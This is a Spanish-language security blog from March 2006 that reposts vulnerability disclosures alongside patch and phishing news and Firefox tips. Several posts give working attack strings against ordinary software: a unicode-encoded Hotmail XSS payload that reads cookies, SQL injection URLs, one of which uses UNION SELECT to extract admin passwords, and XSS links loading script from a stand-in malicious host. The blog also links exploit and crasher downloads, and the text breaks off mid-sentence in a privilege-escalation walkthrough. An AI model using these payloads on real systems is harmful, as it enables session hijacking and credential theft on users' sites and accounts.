ecoestadistica.com

martes, marzo 28, 2006

MSN Hotmail : Vulnerabilidad Cross-Site Scripting

El motor de filtración de Hotmail es insuficiente para filtrar Javascript. Es posible escribir Javascript en el atributo de BGCOLOR de la etiqueta de BODY, usando CSS. Esto conduce a la ejecución del script cuando se ve el email.
El Javascript debe ser unicode codificado para engañar el filtro. Esta codificación se reconoce con IE > = 6.

Prueba de Concepto:

Cuando un usuario envia un mail de la siguiente forma:

html>
body bgcolor="#CCCCCC; background-image:
url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029">
p>By http://www.mousehack.blogspot.com !!!/p> /body /html

La victima recibe el mail de la siguiente forma:

div>
style="background-color:#CCCCCC;background-image:url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029">
p>By http://www.mousehack.blogspot.com !!!/p> /div

Esta vulnerabilidad se puede utilizar para modificar la configuracion del webmail, para recolectar las cookies de la víctima, y para robar su sesión. Uno puede descargar los email de toda la víctima y las entradas del libro de dirección y enviar email de la cuenta robada.

Creditos:
http://www.nuitduhack.com/accueil_en-nuit-du-hack-2006.htm

Parches extraoficiales para el fallo "createTextRange()" del IE...

Articulo publicado en cyruxNET.org

¨Como esperábamos, acaban de salir los primeros parches extraoficiales, los primeros han sido la gente de eEye y de Determina.
Estos parches no sustituyen al que sacará Microsoft en el boletín de abril, según se dice en el blog de technet, pero soluciona temporalmente el problema en aquellos equipos que por razones de funcionalidad no quieren/pueden desactivar el "Active Scripting.
El parche de Microsoft se está haciendo esperar mucho, mas aún cuando según Websense ya se han contabilizado mas de 200 sitios de malware que utilizan esta vulnerabilidad.
http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=451

Microsoft por ahora da la opción de utilizar el servicio de "Windows Live Safety Center" para eliminar el malware que podamos tener en nuestro equipo.

Parche de eEye:

Según dicen en eEye, cuando Microsoft publique el parche oficial, es conveniente desisntalar antes éste. Por ahora esta solución no evita que el Internet Explorer se relentice, pero si evita la ejecución de código.

Mas info: http://www.eeye.com/html/research/alerts/AL20060324.html

Download: http://www.eeye.com/html/research/tools/JScriptPatchSetup.exe

Download source: http://www.eeye.com/html/research/tools/JScriptPatchSource.txt

Parche de Determina:

Mas info: http://www.determina.com/.../securityadvisory_march272006_1.asp

Download instalación (contiene el source): http://www.determina.com/.../DETCVE-2006-1359.msi
¨

domingo, marzo 26, 2006

Vulnerabilidades...

Web Quiz pro XSS vuln.
vendedor:www.calorisplanitia.com/online-quiz-system.aspx
Version Afectada: pro

Prueba de Concepto:

/prequiz.asp?examid=1&exam=[XSS]
/student.asp?msg=[XSS]

---------------------------------------------------------------------------------------

E-School Management System XSS vuln.
vendedor:www.calorisplanitia.com/e-school-management-system.aspx
Version Afectada: 1.0 y anterior

Prueba de Concepto:

/default.asp?msg=[XSS]

---------------------------------------------------------------------------------------

EZHomepagePro multiple XSS vuln.
vendedor:www.htmljunction.net/ezhomepagepro/index.asp
Version Afectada: v1.5 y anterior

Prueba de Concepto:

/common/email.asp?page=user&m=y&select=mouse-&usid
=2&uname=guest&aname=&adid=[XSS]
/common/email.asp?page=user&m=y&select=mouse-&usid
=2&uname=&aname=[XSS]
/users/users_search.asp?page=user&uname=mouse&usid=
2&aname=&adid=&m=[XSS]
/users/users_search.asp?page=user&uname=mouse&usid=
2&aname=&adid=[XSS]
/users/users_search.asp?page=user&uname=mouse&usid=
2&aname=[XSS]
/users/users_calendar.asp?view=yes&action=write&una
me=mouse&usid=2&date=3/2/2006&sdate=3/2/2006&page=[XSS]
/users/users_profiles.asp?page=user&uname=mouse&usid=
2&aname=&adid=[XSS]
/users/users_profiles.asp?page=user&uname=mouse&usid=
2&aname=[XSS]
/users/users_mgallery.asp?gn=mouse&gp=guest&fl=Favor
ites&usid=[XSS]

--------------------------------------------------------------------------------------

WebAPP multiple XSS vuln.
vendedor:http://www.web-app.org/
Version Afectada: 0.9.9.3.2 y anterior

Prueba de Concepto:

http://victim/cgi-bin/index.cgi?action=[XSS]
http://victim/cgi-bin/index.cgi?action=&id=[XSS]
http://victim/cgi-bin/index.cgi?action=forum
&board=chitchat&op=&num=[XSS]
http://victim/cgi-bin/index.cgi?action=&board=[XSS]
http://victim/cgi-bin/index.cgi?action=&cat=[XSS]

--------------------------------------------------------------------------------------

BlankOL XSS vuln.
vendedor:http://www.blankol.com/
Version Afectada: 1 y anterior

Prueba de Concepto:

/bol.cgi?file=[XSS]
/bol.cgi?function=[XSS]

--------------------------------------------------------------------------------------

Absolute Image Gallery XE 2.0 XSS vuln.

vendedor:http://www.xigla.com/absoluteig/index.htm
Version Afectada:V2.0 y anterior

Prueba de Concepto:

/gallery.asp?action=viewimage&categoryid=8&text
=&imageid=43&box=&shownew=[XSS]

WebSite Maliciosos Utilizan Exploit de Internet Explorer...

Al dia de la fecha se han descubierto mas de 200 sitios web`s maliciosos que estan utilizando la vulnerabilidad aun no parchada del internet explorer.El uso mas comun es atraves de shellcode que ejecutan un trojan Horse downloader que descargan codigo adicional desde HTTP.
Este codigo adicional se manifiesta atraves de BOT's, Spyware, Backdoors, y otros Trojan Downloader's.
El siguiente es un ejemplo a partir de una de las páginas web que llevan a cabo el código del exploit.

http://ciberia.ya.com/webmousehack/trojan.txt

Salu2

viernes, marzo 24, 2006

Cómo convertirse en un experto de Gmail...

En LifeHacker se publicado un artículo sobre cómo ser un Gmail Master, explicando diferentes funcionalidades de este gestor de correo vía web, así como una pequeña lista de añadidos que harán de Gmail una poderosísima (aún más si cabe) herramienta.
El artículo empieza con lo más básico, pero que a muchos les resultará nuevo si acaban de llegar a Gmail: etiquetas y filtros. Después de un pequeño apunte sobre cómo manejarse con múltiples cuentas, llega lo mejor: el uso de Gmail Macros (GreaseMonkey Script), que nos sirve para mejorar sustancialmente la navegación por el teclado, y la aplicación AutoHotKeys, que nos servirá para dotar a Gmail (en realidad a todos lo programas) de autocompletado.

Tras esta personalización, nuestro Gmail quedará tal que así:



Artículo | Lifehacker


Como probar la nueva interfaz de Google...



Google está probando una nueva interfaz para sus búsquedas. En teoría esta interfaz se ofrecía de forma aleatoria a los usuarios, sin embargo podemos forzar a Google para que nos la muestre. Para llevarlo a cabo seguiremos el siguiente paso a paso:
  • Descargar e instalar la extensión de Firefox “Add N Edit Cookies” y reiniciar Firefox. Esta extensión nos permite borrar,crear y modificar la cookies de nuestro navegador.
  • Ejecutar la extensión, para ello nos vamos a Herramientas->Cookies Editor
  • En la ventana que aparece, escribimos google en el cuadro de búsqueda y hacemos click en el botón “Filter/Refresh”.
  • Entre los resultados que nos aparecen buscamos una cookie llamada “PREF”,
  • -si existe hacemos doble click en ella y cambiamos el contenido del campo “content” por el siguiente texto:
    ID=fb7740f107311e46:TM=1142683332:LM=1142683332:S=fNSw6ljXTzvL3dWu
    -si no existe, la podemos crear, para ellos pulsaremos en añadir, podremos en Name:PREF, en dominio: .google.com, y en path: /. en cuanto al apartado expiration date tenemos dos opciones: la primera es marcar “Expire at end of session” si solo queremos ver la nueva interfaz hasta un nuevo reinicio de Firefox o fijar una nueva fecha de expiración si deseamos mantenerla por más tiempo.
  • Hacemos click en “save” y cerramos Cookie Editor. La próxima vez que busquemos en google podremos ver la nueva interfaz.
Solo funciona en el dominio google.com.

Vía | Aicube

Vulnerabilidades del Internet Explorer...

Segun se publica en el boletin informativo de segu-info IE se despacha con tres vulnerabilidades críticas que permiten denegación de servicios y ejecución de código remoto. Las personas que usamos otros navegadores tampoco estamos cubiertos ya que una de las vulnerabilidades reportadas también impacta a FireFox.

1. El 20 de marzo Michal Zalewski en su sitio web a puesto a disposición del
público una PoC (Proof of Concept) que permite una DoS en IE, debido a un
Buffer Overflow en el componente "mshtml.dll". Según se menciona en el
anuncio original esta vulnerabilidad permite la ejecución de código remoto.
http://lcamtuf.coredump.cx/iedie.html

Esta PoC no afecta a FireFox.

--
2. El 21 de marzo http://www.computerterrorism.com informó de una vulnerabilidad Crítica en IE, la cual permite ejecución de código remoto.
La PoC puede verse aquí:
http://www.computerterrorism.com/research/ie/ct21-11-2005


Si bien Microsoft informa que ha solucionado esta vulnerabilidad en su
boletin MS05-54 (del 12-05-2005) y la misma ha sido clasificada como
CVE-2005-1790, evidentemente esto no ha sido así, ya que según su
descubridor, Benjamin Tobias Franz, la vulnerabilidad y la respectiva PoC ha
sido liberada al público porque Microsoft no ha cumplido con reconocerla o
en informar los tiempos de solución.
Según se informa la PoC puede lanzar una calculadora de Windows (calc.exe) o
ventanas de diálogo emergentes.
En las pruebas con Windows XP con todos las actualizaciones al día he notado
los siguientes efectos según el navegador utilizado:
a. En IE, la PoC, lanza una ventana de diálogo y el navegador se vuelve
inestable causando una DoS del mismo. La aplicación calc.exe no se ha
ejecutado.
El resultado pueden verse en esta imagen:
http://www.segu-info.com.ar/boletin/img/bol37_dos_ie.png
b. En FireFox, la PoC, luego de un tiempo lanza cuatro ventanas y se vuelve
inestable causando una DoS del mismo.
El resultado puede verse en esta imágen:
http://www.segu-info.com.ar/boletin/img/bol37_dos_ff.png

--
3. Ayer, 22 de marzo, nuevamente http://www.computerterrorism.com ha informado
de otra vulnerabilidad también en la "mshtml.dll" que permite la ejecución de
código en IE mediante la utilización de la función "createTextRange" sobre
el control Checkbox o Radiobuttom.
La PoC puede verse aquí:
http://www.computerterrorism.com/research/ct22-03-2006
Esta PoC no afecta a FireFox.

gracias a cristian de segu-info

Agrego los codigos de los exploits para quien lo desee modificar:

Internet Explorer "createTextRang" Download Shellcoded Exploit

Internet Explorer Remote Code Execution Exploit v 0.1


Saludos!

miércoles, marzo 22, 2006

Microsoft Internet Explorer CreateTextRange Vuln. de Ejecucion Remota de Codigo...

Microsoft Internet Explorer es susceptible a una vulnerabilidad de ejecucion remota de codigo.
El error se produce por un defecto en la aplicacion que resulta en una invalida table-pointer dereference.
Un atacante remoto puede explotar esta situacion para hacer ¨colgar¨ los browsers afectados o para ejecutar código automático arbitrario en el contexto de usuarios afectados.

Versiones vulnerables:

- Internet Explorer 6
- Internet Explorer 7 beta 2

Otras versiones tambien podrian verse afectadas.

Prueba de Concepto

Codigo

Exploits para las vulnerabilidades de Febrero...

Como todos los meses, despues de publicarse los parches de Microsoft, comienzan a aparecer lo exploits correspondientes a esos parches.
Por ahora ya son cuatro los publicados dos de ellos para el MS06-006 y dos para el MS06-005.
Estos son los parches tal y como los han denominado en FrSIRT Microsoft Windows Media Player 10 Plugin Remote Code Execution Exploit (MS06-006)

Exploit para el plugin del WMP 10 que funciona en sistemas que utilizando el Mozilla Firefox.
Segun el source ha sido testeado con Firefox 1.5.0.1/Windows Media Player 10/Windows XP SP2 (US)
Una vez ejecutado crea en el sistema de la victima una cuenta de administrador con el User: wmp0wn3d y Password: password

Microsoft Windows Media Player 9 Plugin Remote Code Execution Exploit (MS06-006)
Exploit, para ser utilizado desde el Metasploit, para el plugin del WMP 9 que funciona en sistemas que esten utilizando el Mozilla Firefox u Opera.

Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005) #2

Overflow mediante un archivo bmp Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005)
Lo mismo que el anterior, aunque de una manera un poco diferente.Afecta al Microsoft Windows Media Player 7.1 hasta el 10

Crea un archivo llamado "crafted.bmp" que se ha de guardar en un archivo con extension .asx que contenga este codigo (o similar):

table border="0" align="center" class="borde" >
tr>
td class="msdos" >
p> <ASX version="3.0">
<ENTRY>
<TITLE>Windows Media Player BMP Heap Overflow (MS06-005)</TITLE>
<REF HREF="crafted.bmp"/>
<DURATION VALUE="60:00"/>
</ENTRY>
</ASX>

Actualizacion 22-03-2006:

Publicados varios exploits para el MS06-007:
Versión para Windows: (Para probar los exploits se debe poseer permisos de administrador y tener el firewall desactivado).

IGMP v3 DoS Exploit: MS06-007_igmps.zip (igmps.c + igmps.exe)

Version Gui: MS06-007_EvilIGMP.rar (homepage: http://www.securitylab.ru/poc/264136.php)

  • Versión para Linux:

  • MS06-007 Denial of Service POC exploit created by Firestorm: MS06-007_linux.c


  • Origen: www.frsirt.com
    Fuente:http://cyruxnet.org/news.htm

    lunes, marzo 20, 2006

    Vulnerabilidades en Web`s Site...

    Altavista.Com

    domingo, marzo 19, 2006

    XSS en el Sitio Astalavista.com...

    La pagina de seguridad de Astalavista.Com es susceptible a un ataque del tipo ¨Cross-Site Scripting¨.

    Prueba de Concepto:

    http://www.astalavista.com/

    sábado, marzo 18, 2006

    Vulnerabilidades....

    Sitio :
    http://www.contrexx.com

    Bug :
    http://victim/path/index.php/">

    Vulnerable :
    All Version ( => v1.0.8 )

    Credit :
    Soot
    Shabgard Security Team
    ---------------------------------------------------------------------------------------

    BetaParticle Blog <= 6.0 Multiple Remote SQL Injection
    Vulnerabilities

    Vendedor: BetaParticle (http://www.betaparticle.com/)
    Version: 6.0

    Ejemplo:

    GET -> http://[sitio]/bpdir/template_permalink.asp?id=[SQLQuery]
    GET -> http://[sitio]/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery]

    Ejemplo:

    http://[sitio]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SELECT+null,fldAuthorUsername
    ,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1

    Con este ejemplo un atacante remoto podría obtener el pass de la administración y realizar la entrada de /main.asp

    Salu2

    M.I.E. Script Action Handler Buffer Overflow Vulnerability

    Microsoft Internet Explorer es susceptible a un ataque remoto del tipo buffer-overflow en ¨MSHTML.DLL¨.El error se produce por la falta de un correcto chequeo de los limites de los datos de entrada antes de copiarlos en el buffer de la memoria.

    Este fallo podria ser aprovechado por un atacante remoto para producir un ¨cuelgue¨ en el browser del vistante de una web maliciosa.La ejecucion remota de codigo, en principio podria ser posible, aunque no fue confirmado.

    Prueba de Concepto:

    Codigo de prueba

    Prueba del Codigo

    viernes, marzo 17, 2006

    Oxynews Sql injection....

    Website:http://www.oxynews.net/

    Demo:http://www.scriptevi.com/files/demo/news/oxynews/


    Prueba de Concepto:

    http://victima.com/oxynews/index.php?oxynews_comment_id=(sql)

    Google:"News managed with OxyNews © 2002"

    Credit:R00t3RR0R

    Salu2

    jueves, marzo 16, 2006

    Vulnerabilidades que debes pagar...

    Interesante informacion publicada en kriptopolis (la cito textual)

    ¨Los suscriptores de los feeds sobre exploits de la empresa francesa FrSIRT nos hemos llevado hoy una desagradable sorpresa:
    Exploits and PoCs are available to FrSIRT VNS™ subscribers only.
    Public exploits section has been definitively closed.
    Y es que FrSIRT acaba de poner en marcha un servicio de notificación de vulnerabilidades previo pago.
    Aunque entendemos que la decisión de FrSIRT pueda generar malestar, no nos coge por sorpresa, porque responde a una tendencia que empieza a generalizarse...
    En España hace ya tiempo que una empresa regala una vulnerabilidad al día y cobra por el resto.
    También hace un año que iDefense puso en marcha VCP, una polémica línea de negocio -que parece haberse revelado bastante rentable- dirigida a comerciar con las vulnerabilidades descubiertas por terceros.
    Frame4 Security Systems también ha puesto en marcha MD:Pro, otro servicio de pago que proporciona decenas de miles de ejemplos de malware e incluye el acceso a un curioso depósito de troyanos.
    Sin embargo (y aunque no falta gente que se muestra muy crítica con algunos de estos "nuevos" modelos de negocio), personalmente no me sorprenden, ni veo motivo alguno para rasgarse las vestiduras.
    La seguridad vende y las empresas están para lo que están: ganar dinero.
    Nadie debería engañarse demasiado al respecto.¨

    Creo que todos somos coincidentes en eso...

    Salu2

    miércoles, marzo 15, 2006

    Publicados los parches para Marzo de Microsoft...

    Son dos los parches publicados por Microsoft para actualizar el sistema este mes.
    MS06-011Permissive Windows Services DACLs Could Allow Elevation of Privilege (914798)
    Este parche corrige el fallo que comentamos aquí:
    Escalada de privilegios en Windows debida a una mala programación de los permisos en la configuración de múltiples servicios: http://cyruxnet.org/archivo.php?20060203.00
    Lista de servicios vulnerables a la elevación de privilegios: http://cyruxnet.org/archivo.php?20060204.00
    SrvCheck v2.0: Exploit para la elevar privilegios en redes Windows: http://cyruxnet.org/archivo.php?20060213.00

    Este fallo estaba dejando muchos sistemas vulnerables ante una elevación de privilegios y dado que la información publicada era extensa y que el exploit público demostraba la gravedad del fallo, Microsoft se ha puesto las pilas y ha publicado el parche en la entrega de este mes.

    Mas información:

    CVE: CAN-2006-0023

    Boletín de Microsoft: http://www.microsoft.com/technet/security/bulletin/ms06-011.mspx



    MS06-012: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (905413)

    Esta actualización corrige varios fallos en la suite Office de Microsoft todos ellos considerados críticos y que permiten a un atacante ejecutar código remotamente. Este parche sustituye algunos anteriores publicados para el office:



    • Microsoft Office Excel Remote Code Execution Using a Malformed Range Vulnerability - CVE-2005-4131


    • Microsoft Office Excel Remote Code Execution Using a Malformed File Format Parsing Vulnerability - CVE-2006-0028

    • Microsoft Office Excel Remote Code Execution Using a Malformed Description Vulnerability - CVE-2006-0029

    • Microsoft Office Excel Remote Code Execution Using a Malformed Graphic Vulnerability - CVE-2006-0030


    • Microsoft Office Excel Remote Code Execution Using a Malformed Record Vulnerability - CVE-2006-0031

    • Microsoft Office Remote Code Execution Using a Malformed Routing Slip Vulnerability - CVE-2006-0009


    Mas información: http://www.microsoft.com/technet/security/bulletin/ms06-012.mspx


    Origen: www.microsoft.com/technet/security/
    Fuente: CyruxNet

    lunes, marzo 13, 2006

    Grave fallo de seguridad en Ubuntu...

    Acaba de desvelarse la existencia de un grave fallo de seguridad en Ubuntu, que facilita a un usuario local el acceso a las claves del usuario principal.

    Un descuido de los diseñadores de la distribución, que al instalar Ubuntu Breezy crean un archivo de texto plano en
    /var/log/installer/cdebconf/questions.dat en donde almacenan todas las respuestas dadas durante el proceso de instalación.

    El problema reside en que entras las respuestas almacenadas también aparece la contraseña del usuario principal.

    El archivo questions.dat es de libre acceso para todos los usuarios.

    (Actualización) El fallo de seguridad ya ha sido solventado, basta con actualizar con "apt-get upgrade"

    Articulo en UbuntuForums
    Vulnerabilidad Solucionada

    Microsoft Live Messenger ya disponible...

    Microsoft acaba de lanzar en abierto la primera beta del nuevo Windows Live Messenger.

    Windows Live Messenger es la próxima generación de MSN Messenger, y como este su descarga es gratuíta.

    Más información y descargas a partir del enlace siguiente:

    http://www.msn.co.uk/messengerbeta/Default.asp?MSPSA=1

    sábado, marzo 11, 2006

    Nuevo ataque de phishing contra vulnerabilidad WMF de Microsoft...

    La alerta la ha facilitado la Asociación de Internautas que señala un gran ataque que aprovecha la vulnerabilidad WMF de Microsoft. El ataque se vuelve a producir con el sistema del correo. La web falsa es http://deagtea.com

    Al enviar la orden que lleva el mensaje, se ejecuta un programa que se activa sin la autorización del usuario. Según ha facilitado la Asociación de Internautas el mensaje enviado por los estafadores es el siguiente:

    -----Mensaje original-----
    De: Canon Online Store [mailto:order_85693258A@canon.es]
    Enviado el: martes, 07 de marzo de 2006 14:47
    Para: REMITENTE
    Asunto: Su orden #85693258A a total de ˆ 729 fue aceptado

    Le agradecemos a Ud una compra con nuestra empresa.

    Su orden No 85693258A para Canon EOS 350 D Digital Camera a total de ˆ
    729 fue aceptado.

    Su carta bancaria se incluira en aquel importe.

    Le agradecemos su compra.

    Ud puede comprobar su orden en sus Parametros del Usuario

    http://deagtea.com Apriete aqui para ver su orden

    Muy atentamente,
    Canon Online Store
    -----Mensaje final-----

    Es aconsejable hacer caso omiso de este tipo de mensajes y eliminarlos de inmediato.

    viernes, marzo 10, 2006

    Consejo: Reduce el consumo de memoria de tu Firefox...

    Uno de los mayores lastres de firefox 1.5 está siendo el excesivo consumo de memoria que en algunos casos está alcanzando limites insospechados, llegando incluso alcanzar cientos de megas.

    Mientras se soluciona este problema en futuras versiones o actualizaciones, seria conveniente unos consejos para reducir al mínimo este consumo:

    Temas y extensiones:
    Algunos temas y extensiones pueden aumentar le consumo de forma sgnificativa, para ver si esta es la causa de nuestros problemas probaremos arrancar firefox en modo seguro.

    Adblock:
    Se tiene constancia de casos en los que usando Firefox con versiones antiguas de Adblock se produce un consumo excesivo de memoria, por lo que es reconmendable actualizar a la última versión o usar Adblock Plus

    Fasterfox:
    Otra extensión que modifica algunos de los parámetros de firefox, como el tamaño de la cache y el número de conexiones simultáneas, y además permite precargar los enlaces de la página actual. Si bien esta extensión disminuye el tiempo que tardan en cargar las páginas incrementa notablemente el uso de la memoria.

    Firefox Preloader:
    Se trata de una utilidad que precarga algunos elementos del navegador en memoria consiguiendo que se inicie más rápidamente.

    Firefox Memory Cache:
    Por defecto Firefox no usa un tamaño predetermiando de memoria cache sino que usa un porcentaje de la memoria del sistema. Podemos establecer una cifra concreta en kilobytes para reducir el uso de memoria a través de la siguiente entrada de about:config browser.cache.memory.capacity . Tambien podemos deshabilitarlo totalmente a través de la entrada browser.cache.memory.enable estableciendola a false

    Consumo de memoria al minimizar
    Esta es una preferencia que minimiza el consumo de memoria cuando minimizamos el navegador, para activarla agregaremos o localizaremos a través de about:config la siguiente entrada config.trim_on_minimize y le pondremos como valor true

    Fast Back/Forward
    Firefox 1.5 tiene una nueva característica que reduce el tiempo que tardan en cargarse las paginas cuando usamoslos botones del navegador Ir a la página anterior / Ir a la página posterior. Si tenemos activada esta característica recargamos la memoria. Para deshabilitar esta opción hay que darle a browser.sessionhistory.max_total_viewers un valor 0 con lo que no almcena ninguna págian en memoria

    Historial de navegación:
    Si establecemos un valor muy alto para el historial de navegación, se incrementa el uso de memoria lo arazonable es establcer un valor reducido.

    Fuente | Forums Mozillazine - MozillaZine Knowledge Base

    salu2

    Defecto crítico de Office que se remendará...

    Como parte de su ciclo de remiendos mensual, Microsoft planea lanzar el martes dos boletines de la seguridad con los arreglos para los defectos en office y Windows.

    La alarma para office se juzga "crítica", el grado de riesgo más alto de Microsoft, seguen ha dicho la compañia en un un aviso fijado en su Web site el jueves. El boletín de Windows es "clasificado importante", una calificacion baja en el sistema de grados de Microsoft.

    Microsoft clasifica como crítico cualquier amenaza de la seguridad que podría permitir que un gusano de Internet se ejecute sin ninguna acción requerida de parte del usuario. Los problemas juzgados "importantes" se podían explotar para comprometer el secreto, la integridad o la disponibilidad de datos, o la integridad o la disponibilidad de procesar recursos, según la compañía.

    El mes pasado, Microsoft lanzó siete boletines de la seguridad también que cubrían defectos en Office y Windows. Dos de esos boletines eran marcados críticos con etiqueta. El miércoles, emergió que uno de los remiendos del mes pasado puede causar un cierto apuro para usuarios de Microsoft's Windows Media Player 10.

    El aviso de Microsoft no especificó qué componentes de Windows o de office se están reparando con los remiendos del martes o cuántos defectos abordará la actualización. Los investigadores de la seguridad con eEye Digital Security enumeran una vulnerabilidad en su Web site para el cual el arreglo se considera con 90 días de retraso.

    Como parte de su boletin mensual , Microsoft también planea lanzar una versión actualizada de la herramienta Windows Malicious Software Removal. El software detecta y quita el código malévolo común puesto en las computadoras.

    salu2

    Norton AntiVirus Crasher (exploit)...

    Norton AntiVirus (NAV, también conocido como Symantec Antivirus) es el producto insignia de Symantec Corporation y es uno de los programas más extensamente instalado de anti-virus.

    Sistemas Vulnerables:
    * Norton AntiVirus 2005 que funciona en XP SP2
    * Norton AntiVirus 2002, 2003 y 2005 que no funcionan en el XP

    Screenshot:
    http://www.jaascois.com/exploits/18602009/NAV0c.gif

    Exploit:

    http://ciberia.ya.com/webmousehack/NortonKill.txt

    Prueba de Concepto (Exploit Compilado)

    http://ciberia.ya.com/webmousehack/NAV.kill

    mas info:

    http://www.jaascois.com/exploits

    Salu2

    miércoles, marzo 08, 2006

    Vulnerabilidades...

    textfileBB <= 1.0 Multiple XSS

    software: textfileBB
    vendedor website: http://tfbb.jcink.com/

    Prueba de Concepto:

    http://example.com/messanger.php?mess=%3Cscript%20src=http://webmaliciosa.
    ws/xss.js%3E%3C/script%3E

    http://example.com/messanger.php?p=MSN&user=%3Cscript%20src=http:
    //webmaliciosa.ws/xss.js%3E%3C/script%3E

    http://example.com/messanger.php?p=YIM&user=%3Cscript%20src=http:
    //webmaliciosa.ws/xss.js%3E%3C/script%3E

    http://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=http:
    //webmaliciosa.ws/xss.js%3E%3C/script%3E

    http://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscri
    pt%20src=http://webmaliciosa.ws/xss.js%3E%3C/body%3E%3C/html%3E

    Credito: retard
    --------------------------------------------------------------------------------------

    d2kBlog Multiple Vulnerabilidades

    producto : d2kBlog <= 1.0.3
    Vendedor: http://www.d2ksoft.com/

    Prueba de Concepto:

    SQL_Injection :
    Cookie : memName=[SQL_Injection]

    Script Insertion :
    Default.asp , POST : name=KAPDA&email=KAPDA&msg=&submit=Send+Message

    martes, marzo 07, 2006

    DoS en Internet Explorer con Shockwave Flash [JScript's document.write() method]

    Se ha reportado una vulnerabilidad del tipo DoS (Denegación de Servicio) en Internet Explorer.

    Un usuario remoto puede crear un archivo html que contenga código script especialmente alterado que, al ser cargado por el navegador del usuario atacado, ocasionará el fallo o cuelgue del mismo.

    El código script invoca un archivo Shockwave Flash para generar el fallo.

    Existen un par de exploits de demostración en las siguientes direcciones:

    DoS exploit en IE:
    http://www.anspi.pl/~porkythepig/iedown.html

    Cuelgue al oprimir el botón derecho del mouse:
    http://www.anspi.pl/~porkythepig/index.html

    Plataformas vulnerables en que fue testeado el IE:
    Windows 2000 sp4 con todos los parches al día
    Windows XP sp2
    Windows XP64
    Windows 98 SE

    Según el autor de los exploits, la posibilidad de ejecutar código arbitrario mediante este fallo aún no ha sido verificada, aunque podría existir.

    Solución:
    No existe solución para este fallo por el momento.

    Créditos:
    porkythepig

    Ref.:
    SecurityTracker Alert ID: 1015559
    Microsoft Internet Explorer Shockwave Flash Scripting Bug Lets Remote Users Deny Service
    http://securitytracker.com/id?1015559

    Bugtraq:
    Internet Explorer remotely exploitable vulnerability in JScript's document.write() method
    http://seclists.org/lists/bugtraq/2006/Feb/0010.html

    lunes, marzo 06, 2006

    SQL injection en Invision Power Board v2.1.5...

    Software: Invision Power Board

    Web Site : http://forums.invisionpower.com

    Versions: v2.1.5

    Ejemplo:

    http://www.victima.com/forum/index.php?showtopic=(cualquier topic)&pid=1&st=-1(sql)

    SQL injection & XSS en vbzoom v1.11

    vbzoom v1.11

    Web Site:http://www.vbzoom.com

    Versions: V1.11

    == SQL Injection ==

    http://www.victima.com/vz/show.php?UserID=1&MainID=1&SubjectID=[SQL]

    http://www.victima.com/vz/show.php?UserID=1&MainID=[SQL]&SubjectID=1

    ==== XSS ====

    http://www.victima.com/vz/comment.php?UserID='>XSS

    http://www.victima.com/vz/profile.php?UserID=1&UserName='>XSS

    http://www.victima.com/vz/contact.php?UserID='>XSS

    Simple Machines Forum - SMF 'X-Forwarded-For' XSS Vuln.

    Script Vulnerable: Sources/Register.php
    Version:1.0.6

    Detalles:

    La Variable $_SERVER['HTTP_X_FORWARDED_FOR']no se esteriliza correctamente. Esto se puede utilizar para fijar un post HTTP con una falsificacion de ¨X-Forwarded-For¨ conteniendo codigo arbitrario HTML o codigo Script.
    Este Codigo podria ejecutarse cuando el administrador abriera la seccion "View all members" en el panel de control.
    La sesion del administrador podria verse comprometida.

    Exploit:

    http://evuln.com/vulns/86/exploit.html


    Ejemplo de HTTP POST Query:

    POST /smf/index.php? PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944&action=register2 HTTP/1.0
    Host: [host]
    X-Forwarded-For: anyIP(XSS)
    Cookie: PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944
    Content-Length: 81

    user=mmm&email=mmm@mmm.com&passwrd1=mmm&passwrd2=mmm®agree=1®Submit=Register

    Exploits para las vulnerabilidades de Febrero...

    Como todos los meses, después de publicarse los parches de Microsoft, comienzan a aparecer lo exploits correspondientes a esos parches.
    Por ahora ya son cuatro los publicados dos de ellos para el MS06-006 y dos para el MS06-005.
    Estos son los parches tal y como los han denominado en FrSIRT :

    Origen: www.frsirt.com

    Paper: Elevacion de Privilegios en Windows....

    El 31 de enero del corriente, Sudhakar Govindavajhala y Andrew W.
    Appel publicaron "Windows Access Control Demystified" un profundo
    análisis sobre la forma en que Windows maneja el control de accesos y
    los permisos.
    Este documento expone distintas formas de elevar privilegios, es
    decir, poder obtener permisos (de administrador o cuentas del sistema)
    que un usuario normal generalmente no posee.
    En este caso el culpable no es Microsoft, a menos que se lo culpe de
    hacer demasiado complejos y completos los niveles de acceso. Lo que
    lleva a la elevación de privilegios es la mala implementación de los
    permisos por parte de empresas fabricantes de software que por
    desconocimiento, error o negligencia no asignan los permisos
    estrictamente necesarios para que una aplicación funcione.

    En cambio Microsoft sí tiene programas y servicios que asignan en
    forma incorrecta los permisos en Windows, como cualquier otro
    fabricante.
    Mediante estos servicios u otros de terceros es posible realizar la
    explotación y lograr privilegios administrativos.

    Microsoft se ha pronunciado sobre este tema exponiendo cómo único
    factor de mitigación la instalación de actualizaciones, y la
    activación y correcta configuración de un Firewall.

    A modo de ejemplo haxorcitos a través de tarako (Andrés Tarascó) ha
    desarrollado una aplicación que permite elevar los permisos de un
    usuario restringido.
    Utilizando esa herramienta he realizado esta demostración logrando
    permisos administrativos sobre un equipo al cual tenía acceso con
    mínimos privilegios (guest).
    NOTA: Las imágenes están situadas en:
    http://www.segu-info.com.ar/boletin/img/bol34_xx.png

    PASO 1. La máquina víctima es Windows XP SP2 con todas las
    actualizaciones instaladas y sin el Firewall activado. Si se activa el
    Firewall el ataque no se puede llevar a cabo ya que la conexión es
    denegada.
    Aquí vemos la importancia de esta sencilla medida de seguridad que
    nunca debería dejar de considerarse.
    La IP víctima es 192.168.0.34 y mediante el uso de la herramienta de
